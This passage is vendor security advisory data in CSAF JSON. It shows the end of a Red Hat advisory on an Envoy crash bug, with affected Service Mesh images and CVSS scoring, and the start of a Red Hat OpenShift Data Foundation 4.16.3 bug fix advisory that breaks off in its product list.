"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Envoy crashes for `LocalReply` in HTTP async client"
}
]
}
RHSA-2024:8113
Vulnerability from csaf_redhat - Published: 2024-10-15 08:52 - Updated: 2025-11-21 19:14Summary
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.3 security and bug fix update
Notes
Topic
Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.3 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.
Details
Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an
S3 compatible API.
Bug fixes:
* Previously, on the disaster recover (DR) monitoring dashboard, the detail about `Last snapshot synced` was missing for appset based applications. With this fix, the dashboard shows the `lastGroupSyncTime` under the `Volume snapshot` for the selected appset based applications. (BZ#2295324)
* Previously, when OpenShift Data Foundation was installed in a namespace other than `openshift-storage`, such as ROSA, the user interface (UI) labelled the nodes during the StorageSystem deployment and added a dynamic label "cluster.ocs.openshift.io/<CLUSTER_NAMESPACE>: ‘'", where "CLUSTER_NAMESPACE" is the namespace in which the StorageSystem is getting created). However the ODF/OCS operators expected the label to be always a static label, "cluster.ocs.openshift.io/openshift-storage: ‘’.
With this fix, the user interface adds a static label "cluster.ocs.openshift.io/openshift-storage: ‘’ to the nodes and as a result the installation proceeds as expected. (BZ#2303083)
Enhancement:
* In the storage clients table of the Storage clients page of the OpenShift web console, storage cluster name is displayed along with the cluster ID to provide better clarity. (BZ#2304905)
All users of Red Hat OpenShift Data Foundation are advised to upgrade to these updated images, which provide these bug fixes.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.3 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an\nS3 compatible API.\n\nBug fixes:\n\n* Previously, on the disaster recover (DR) monitoring dashboard, the detail about `Last snapshot synced` was missing for appset based applications. With this fix, the dashboard shows the `lastGroupSyncTime` under the `Volume snapshot` for the selected appset based applications. (BZ#2295324)\n\n* Previously, when OpenShift Data Foundation was installed in a namespace other than `openshift-storage`, such as ROSA, the user interface (UI) labelled the nodes during the StorageSystem deployment and added a dynamic label \"cluster.ocs.openshift.io/\u003cCLUSTER_NAMESPACE\u003e: \u2018\u0027\", where \"CLUSTER_NAMESPACE\" is the namespace in which the StorageSystem is getting created). However the ODF/OCS operators expected the label to be always a static label, \"cluster.ocs.openshift.io/openshift-storage: \u2018\u2019.\nWith this fix, the user interface adds a static label \"cluster.ocs.openshift.io/openshift-storage: \u2018\u2019 to the nodes and as a result the installation proceeds as expected. (BZ#2303083)\n\nEnhancement:\n\n* In the storage clients table of the Storage clients page of the OpenShift web console, storage cluster name is displayed along with the cluster ID to provide better clarity. (BZ#2304905)\n\nAll users of Red Hat OpenShift Data Foundation are advised to upgrade to these updated images, which provide these bug fixes.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:8113",
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2283959",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283959"
},
{
"category": "external",
"summary": "2295324",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2295324"
},
{
"category": "external",
"summary": "2296521",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2296521"
},
{
"category": "external",
"summary": "2300333",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300333"
},
{
"category": "external",
"summary": "2302463",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302463"
},
{
"category": "external",
"summary": "2303083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303083"
},
{
"category": "external",
"summary": "2304905",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304905"
},
{
"category": "external",
"summary": "2308445",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308445"
},
{
"category": "external",
"summary": "2310370",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310370"
},
{
"category": "external",
"summary": "2312055",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312055"
},
{
"category": "external",
"summary": "2315708",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315708"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8113.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.3 security and bug fix update",
"tracking": {
"current_release_date": "2025-11-21T19:14:30+00:00",
"generator": {
"date": "2025-11-21T19:14:30+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.12"
}
},
"id": "RHSA-2024:8113",
"initial_release_date": "2024-10-15T08:52:38+00:00",
"revision_history": [
{
"date": "2024-10-15T08:52:38+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-15T08:52:38+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-11-21T19:14:30+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHODF 4.16 for RHEL 9",
"product": {
"name": "RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_data_foundation:4.16::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Data Foundation"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"product_id": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"product_id": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"product_id": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"product_id": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
